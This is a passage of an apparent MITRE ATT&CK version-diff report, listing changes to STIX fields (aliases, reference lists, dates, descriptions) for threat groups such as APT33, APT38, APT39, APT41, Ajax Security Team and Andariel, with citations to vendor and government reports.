| external_references[19]['description'] | FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021. | F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015. |
| external_references[19]['url'] | https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html | https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf |
| external_references[20]['source_name'] | MSTIC NOBELIUM Mar 2021 | ESET Dukes October 2019 |
| external_references[20]['description'] | Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021. | Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020. |
| external_references[20]['url'] | https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ | https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf |
| external_references[21]['source_name'] | CrowdStrike SUNSPOT Implant January 2021 | FireEye SUNBURST Backdoor December 2020 |
| external_references[21]['description'] | CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021. | FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021. |
| external_references[21]['url'] | https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/ | https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html |
| external_references[22]['source_name'] | Volexity SolarWinds | SentinelOne NobleBaron June 2021 |
| external_references[22]['description'] | Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020. | Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021. |
| external_references[22]['url'] | https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ | https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/ |
| external_references[23]['source_name'] | Cybersecurity Advisory SVR TTP May 2021 | Microsoft Unidentified Dec 2018 |
| external_references[23]['description'] | NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021. | Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019. |
| external_references[23]['url'] | https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf | https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/ |
| external_references[24]['source_name'] | FireEye APT29 Nov 2018 | MSTIC NOBELIUM May 2021 |
| external_references[24]['description'] | Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018. | Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021. |
| external_references[24]['url'] | https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html | https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ |
| external_references[25]['source_name'] | ESET Dukes October 2019 | MSRC Nobelium June 2021 |
| external_references[25]['description'] | Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020. | MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021. |
| external_references[25]['url'] | https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf | https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/ |
| external_references[26]['source_name'] | NCSC APT29 July 2020 | MSTIC Nobelium Toolset May 2021 |
| external_references[26]['description'] | National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020. | MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021. |
| external_references[26]['url'] | https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf | https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/ |
| external_references[27]['source_name'] | SentinelOne NobleBaron June 2021 | MSTIC NOBELIUM Mar 2021 |
| external_references[27]['description'] | Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021. | Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021. |
| external_references[27]['url'] | https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/ | https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ |
| external_references[28]['source_name'] | MSTIC NOBELIUM May 2021 | NCSC APT29 July 2020 |
| external_references[28]['description'] | Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021. | National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020. |
| external_references[28]['url'] | https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ | https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf |
| external_references[29]['source_name'] | MSTIC Nobelium Toolset May 2021 | Cybersecurity Advisory SVR TTP May 2021 |
| external_references[29]['description'] | MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021. | NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021. |
| external_references[29]['url'] | https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/ | https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf |
| external_references[30]['source_name'] | MSRC Nobelium June 2021 | NSA Joint Advisory SVR SolarWinds April 2021 |
| external_references[30]['description'] | MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021. | NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021. |
| external_references[30]['url'] | https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/ | https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF |
| external_references[31]['source_name'] | Microsoft Unidentified Dec 2018 | Secureworks IRON HEMLOCK Profile |
| external_references[31]['description'] | Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019. | Secureworks CTU. (n.d.). IRON HEMLOCK. Retrieved February 22, 2022. |
| external_references[31]['url'] | https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/ | http://www.secureworks.com/research/threat-profiles/iron-hemlock |
| x_mitre_version | 2.1 | 3.1 |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | IRON RITUAL | |
| aliases | IRON HEMLOCK | |
| external_references | {'source_name': 'Secureworks IRON RITUAL Profile', 'description': 'Secureworks CTU. (n.d.). IRON RITUAL. Retrieved February 24, 2022.', 'url': 'https://www.secureworks.com/research/threat-profiles/iron-ritual'} | |
| external_references | {'source_name': 'UK Gov Malign RIS Activity April 2021', 'description': 'UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021.', 'url': 'https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services'} | |
| external_references | {'source_name': 'UK Gov UK Exposes Russia SolarWinds April 2021', 'description': 'UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021.', 'url': 'https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise'} | |
| external_references | {'source_name': 'UK NSCS Russia SolarWinds April 2021', 'description': 'UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.', 'url': 'https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise'} | |
| external_references | {'source_name': 'White House Imposing Costs RU Gov April 2021', 'description': 'White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021.', 'url': 'https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/'} |
| Description |
|---|
| [APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Dragos Threat Intelligence'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-05-26 12:40:42.907000+00:00 | 2022-05-23 21:22:08.170000+00:00 |
| external_references[4]['source_name'] | FireEye APT33 Sept 2017 | FireEye APT33 Webinar Sept 2017 |
| external_references[4]['description'] | O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018. | Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018. |
| external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html | https://www.brighttalk.com/webcast/10703/275683 |
| external_references[5]['source_name'] | FireEye APT33 Webinar Sept 2017 | Microsoft Holmium June 2020 |
| external_references[5]['description'] | Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018. | Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020. |
| external_references[5]['url'] | https://www.brighttalk.com/webcast/10703/275683 | https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/ |
| external_references[6]['source_name'] | Microsoft Holmium June 2020 | FireEye APT33 Sept 2017 |
| external_references[6]['description'] | Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020. | O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018. |
| external_references[6]['url'] | https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/ | https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html |
| Description |
|---|
| [APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 16:33:27.982000+00:00 | 2022-01-18 17:13:14.610000+00:00 |
| Old Description | New Description |
|---|---|
| [APT39](https://attack.mitre.org/groups/G0087) is one of several names for cyberespionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://attack.mitre.org/groups/G0087) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020) | [APT39](https://attack.mitre.org/groups/G0087) is one of several names for cyber espionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://attack.mitre.org/groups/G0087) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-12 23:08:30.844000+00:00 | 2022-09-02 18:03:29.024000+00:00 |
| description | [APT39](https://attack.mitre.org/groups/G0087) is one of several names for cyberespionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://attack.mitre.org/groups/G0087) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020) | [APT39](https://attack.mitre.org/groups/G0087) is one of several names for cyber espionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://attack.mitre.org/groups/G0087) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020) |
| external_references[1]['source_name'] | APT39 | Remix Kitten |
| external_references[1]['description'] | (Citation: FireEye APT39 Jan 2019)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020) | (Citation: Crowdstrike GTR2020 Mar 2020) |
| external_references[2]['source_name'] | REMIX KITTEN | ITG07 |
| external_references[2]['description'] | (Citation: Crowdstrike GTR2020 Mar 2020) | (Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020) |
| external_references[3]['source_name'] | ITG07 | APT39 |
| external_references[3]['description'] | (Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020) | (Citation: FireEye APT39 Jan 2019)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020) |
| external_references[5]['source_name'] | FireEye APT39 Jan 2019 | Crowdstrike GTR2020 Mar 2020 |
| external_references[5]['description'] | Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019. | Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020. |
| external_references[5]['url'] | https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html | https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf |
| external_references[6]['source_name'] | Symantec Chafer Dec 2015 | Dept. of Treasury Iran Sanctions September 2020 |
| external_references[6]['description'] | Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019. | Dept. of Treasury. (2020, September 17). Treasury Sanctions Cyber Actors Backed by Iranian Intelligence. Retrieved December 10, 2020. |
| external_references[6]['url'] | https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets | https://home.treasury.gov/news/press-releases/sm1127 |
| external_references[7]['source_name'] | FBI FLASH APT39 September 2020 | DOJ Iran Indictments September 2020 |
| external_references[7]['description'] | FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020. | DOJ. (2020, September 17). Department of Justice and Partner Departments and Agencies Conduct Coordinated Actions to Disrupt and Deter Iranian Malicious Cyber Activities Targeting the United States and the Broader International Community. Retrieved December 10, 2020. |
| external_references[7]['url'] | https://www.iranwatch.org/sites/default/files/public-intelligence-alert.pdf | https://www.justice.gov/opa/pr/department-justice-and-partner-departments-and-agencies-conduct-coordinated-actions-disrupt |
| external_references[8]['source_name'] | Dept. of Treasury Iran Sanctions September 2020 | FBI FLASH APT39 September 2020 |
| external_references[8]['description'] | Dept. of Treasury. (2020, September 17). Treasury Sanctions Cyber Actors Backed by Iranian Intelligence. Retrieved December 10, 2020. | FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020. |
| external_references[8]['url'] | https://home.treasury.gov/news/press-releases/sm1127 | https://www.iranwatch.org/sites/default/files/public-intelligence-alert.pdf |
| external_references[9]['source_name'] | DOJ Iran Indictments September 2020 | FireEye APT39 Jan 2019 |
| external_references[9]['description'] | DOJ. (2020, September 17). Department of Justice and Partner Departments and Agencies Conduct Coordinated Actions to Disrupt and Deter Iranian Malicious Cyber Activities Targeting the United States and the Broader International Community. Retrieved December 10, 2020. | Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019. |
| external_references[9]['url'] | https://www.justice.gov/opa/pr/department-justice-and-partner-departments-and-agencies-conduct-coordinated-actions-disrupt | https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html |
| external_references[10]['source_name'] | Crowdstrike GTR2020 Mar 2020 | Dark Reading APT39 JAN 2019 |
| external_references[10]['description'] | Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020. | Higgins, K. (2019, January 30). Iran Ups its Traditional Cyber Espionage Tradecraft. Retrieved May 22, 2020. |
| external_references[10]['url'] | https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf | https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764 |
| external_references[11]['source_name'] | Dark Reading APT39 JAN 2019 | Symantec Chafer Dec 2015 |
| external_references[11]['description'] | Higgins, K. (2019, January 30). Iran Ups its Traditional Cyber Espionage Tradecraft. Retrieved May 22, 2020. | Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019. |
| external_references[11]['url'] | https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764 | https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | Remix Kitten |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | REMIX KITTEN |
| Description |
|---|
| [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 00:28:08.413000+00:00 | 2022-06-02 20:09:29.475000+00:00 |
| aliases[1] | WICKED PANDA | Wicked Panda |
| external_references[1]['source_name'] | APT41 | Wicked Panda |
| external_references[1]['description'] | (Citation: FireEye APT41 2019) | (Citation: Crowdstrike GTR2020 Mar 2020) |
| external_references[2]['source_name'] | WICKED PANDA | APT41 |
| external_references[2]['description'] | (Citation: Crowdstrike GTR2020 Mar 2020) | (Citation: FireEye APT41 2019) |
| external_references[3]['source_name'] | FireEye APT41 Aug 2019 | Crowdstrike GTR2020 Mar 2020 |
| external_references[3]['description'] | Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019. | Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020. |
| external_references[3]['url'] | https://content.fireeye.com/apt-41/rpt-apt41 | https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf |
| external_references[4]['source_name'] | Group IB APT 41 June 2021 | FireEye APT41 2019 |
| external_references[4]['description'] | Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021. | FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019. |
| external_references[4]['url'] | https://blog.group-ib.com/colunmtk_apt41 | https://content.fireeye.com/apt-41/rpt-apt41 |
| external_references[5]['source_name'] | Crowdstrike GTR2020 Mar 2020 | FireEye APT41 Aug 2019 |
| external_references[5]['description'] | Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020. | Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019. |
| external_references[5]['url'] | https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf | https://content.fireeye.com/apt-41/rpt-apt41 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://blog.group-ib.com/colunmtk_apt41'} |
| Description |
|---|
| [Ajax Security Team](https://attack.mitre.org/groups/G0130) is a group that has been active since at least 2010 and believed to be operating out of Iran. By 2014 [Ajax Security Team](https://attack.mitre.org/groups/G0130) transitioned from website defacement operations to malware-based cyber espionage campaigns targeting the US defense industrial base and Iranian users of anti-censorship technologies.(Citation: FireEye Operation Saffron Rose 2013) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-22 20:13:14.377000+00:00 | 2021-12-17 19:27:27.246000+00:00 |
| external_references[1]['description'] | Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between Ajax Security Team and the campaign Operation Woolen-Goldfish.(Citation: Check Point Rocket Kitten)(Citation: TrendMicro Operation Woolen Goldfish March 2015) | Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://attack.mitre.org/groups/G0130) and the campaign Operation Woolen-Goldfish.(Citation: Check Point Rocket Kitten)(Citation: TrendMicro Operation Woolen Goldfish March 2015) |
| external_references[3]['description'] | Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between Ajax Security Team and Rocket Kitten.(Citation: Check Point Rocket Kitten)(Citation: IranThreats Kittens Dec 2017) | Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://attack.mitre.org/groups/G0130) and Rocket Kitten.(Citation: Check Point Rocket Kitten)(Citation: IranThreats Kittens Dec 2017) |
| Description |
|---|
| [Andariel](https://attack.mitre.org/groups/G0138) is a North Korean state-sponsored threat group that has been active since at least 2009. [Andariel](https://attack.mitre.org/groups/G0138) has primarily focused its operations--which have included destructive attacks--against South Korean government agencies, military organizations, and a variety of domestic companies; they have also conducted cyber financial operations against ATMs, banks, and cryptocurrency exchanges. [Andariel](https://attack.mitre.org/groups/G0138)'s notable activity includes Operation Black Mine, Operation GoldenAxe, and Campaign Rifle.(Citation: FSI Andariel Campaign Rifle July 2017)(Citation: IssueMakersLab Andariel GoldenAxe May 2017)(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)(Citation: TrendMicro New Andariel Tactics July 2018)(Citation: CrowdStrike Silent Chollima Adversary September 2021) [Andariel](https://attack.mitre.org/groups/G0138) is considered a sub-set of [Lazarus Group](https://attack.mitre.org/groups/G0032), and has been attributed to North Korea's Reconnaissance General Bureau.(Citation: Treasury North Korean Cyber Groups September 2019) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 15:16:47.329000+00:00 | 2022-05-24 16:27:11.471000+00:00 |
| external_references[1]['source_name'] | Andariel | Silent Chollima |
| external_references[1]['description'] | (Citation: FSI Andariel Campaign Rifle July 2017) | (Citation: CrowdStrike Silent Chollima Adversary September 2021) |
| external_references[2]['source_name'] | Silent Chollima | Andariel |
| external_references[2]['description'] | (Citation: CrowdStrike Silent Chollima Adversary September 2021) | (Citation: FSI Andariel Campaign Rifle July 2017) |
| external_references[3]['source_name'] | FSI Andariel Campaign Rifle July 2017 | AhnLab Andariel Subgroup of Lazarus June 2018 |
| external_references[3]['description'] | FSI. (2017, July 27). Campaign Rifle - Andariel, the Maiden of Anguish. Retrieved September 29, 2021. | AhnLab. (2018, June 23). Targeted attacks by Andariel Threat Group, a subgroup of the Lazarus. Retrieved September 29, 2021. |
| external_references[3]['url'] | https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1680.do | http://download.ahnlab.com/global/brochure/[Analysis]Andariel_Group.pdf |
| external_references[4]['source_name'] | IssueMakersLab Andariel GoldenAxe May 2017 | TrendMicro New Andariel Tactics July 2018 |
| external_references[4]['description'] | IssueMakersLab. (2017, May 1). Operation GoldenAxe. Retrieved September 29, 2021. | Chen, Joseph. (2018, July 16). New Andariel Reconnaissance Tactics Uncovered. Retrieved September 29, 2021. |
| external_references[4]['url'] | http://www.issuemakerslab.com/research3/ | https://www.trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html |
| external_references[5]['source_name'] | AhnLab Andariel Subgroup of Lazarus June 2018 | CrowdStrike Silent Chollima Adversary September 2021 |
| external_references[5]['description'] | AhnLab. (2018, June 23). Targeted attacks by Andariel Threat Group, a subgroup of the Lazarus. Retrieved September 29, 2021. | CrowdStrike. (2021, September 29). Silent Chollima Adversary Profile. Retrieved September 29, 2021. |
| external_references[5]['url'] | http://download.ahnlab.com/global/brochure/[Analysis]Andariel_Group.pdf | https://adversary.crowdstrike.com/en-US/adversary/silent-chollima/ |
| external_references[6]['source_name'] | TrendMicro New Andariel Tactics July 2018 | FSI Andariel Campaign Rifle July 2017 |
| external_references[6]['description'] | Chen, Joseph. (2018, July 16). New Andariel Reconnaissance Tactics Uncovered. Retrieved September 29, 2021. | FSI. (2017, July 27). Campaign Rifle - Andariel, the Maiden of Anguish. Retrieved September 29, 2021. |
